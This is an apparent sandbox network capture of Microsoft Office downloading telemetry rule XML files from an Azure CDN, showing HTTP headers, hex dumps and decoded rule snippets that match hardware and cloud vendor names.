                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                            ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                            x-ms-request-id: b67c2655-301e-0096-2300-17e71d000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030902Z-1657d5bbd48cpbzgkvtewk0wu000000004hg00000000420g
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:03 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            92192.168.2.54981713.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:03 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:03 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 416
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                            ETag: "0x8DC582BB5284CCE"
                                                                                                                                                            x-ms-request-id: 821e4157-c01e-0014-3301-17a6a3000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030903Z-1657d5bbd48cpbzgkvtewk0wu000000004dg00000000hbng
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:03 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            93192.168.2.54981813.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:03 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:03 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 472
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                            ETag: "0x8DC582B91EAD002"
                                                                                                                                                            x-ms-request-id: 763e8d43-601e-000d-6912-172618000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030903Z-1657d5bbd48lknvp09v995n790000000041g000000008zu1
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:03 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            94192.168.2.54981913.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:03 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:03 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 432
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                            ETag: "0x8DC582BAABA2A10"
                                                                                                                                                            x-ms-request-id: bfab55ab-401e-0015-6202-170e8d000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030903Z-1657d5bbd48t66tjar5xuq22r800000004a000000000m0kk
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:03 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            95192.168.2.54982013.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:03 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:03 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 427
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                            ETag: "0x8DC582BB464F255"
                                                                                                                                                            x-ms-request-id: 7875ffac-201e-000c-7f02-1779c4000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030903Z-1657d5bbd48xsz2nuzq4vfrzg800000004a00000000053az
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:03 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            96192.168.2.54982113.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:03 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:03 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 475
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                            ETag: "0x8DC582BBA740822"
                                                                                                                                                            x-ms-request-id: 01bf113a-f01e-003c-3703-178cf0000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030903Z-1657d5bbd48q6t9vvmrkd293mg000000048g00000000r8d9
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:03 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            97192.168.2.54982213.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:04 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:04 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 474
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                            ETag: "0x8DC582BA4037B0D"
                                                                                                                                                            x-ms-request-id: 3b7b7106-501e-0064-43e7-161f54000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030904Z-1657d5bbd48tnj6wmberkg2xy800000004fg00000000a2cz
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:04 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            98192.168.2.54982413.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:04 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:04 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 472
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                            ETag: "0x8DC582B984BF177"
                                                                                                                                                            x-ms-request-id: 2f576d96-401e-0047-3902-178597000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030904Z-1657d5bbd4824mj9d6vp65b6n400000004ng0000000064p7
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:04 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            99192.168.2.54982313.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:04 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:04 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 419
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                            ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                            x-ms-request-id: f196d52c-b01e-0002-1604-171b8f000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030904Z-1657d5bbd48q6t9vvmrkd293mg00000004fg0000000001ew
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:04 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            100192.168.2.54982613.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:04 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:04 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 468
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                            ETag: "0x8DC582BBA642BF4"
                                                                                                                                                            x-ms-request-id: f5ee0945-901e-0083-4202-17bb55000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030904Z-1657d5bbd48brl8we3nu8cxwgn00000004mg00000000r34x
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:04 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            101192.168.2.54982513.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:04 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:04 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 405
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                            ETag: "0x8DC582B942B6AFF"
                                                                                                                                                            x-ms-request-id: dfb96d6a-f01e-003f-17e5-16d19d000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030904Z-1657d5bbd48vhs7r2p1ky7cs5w00000004qg00000000af9e
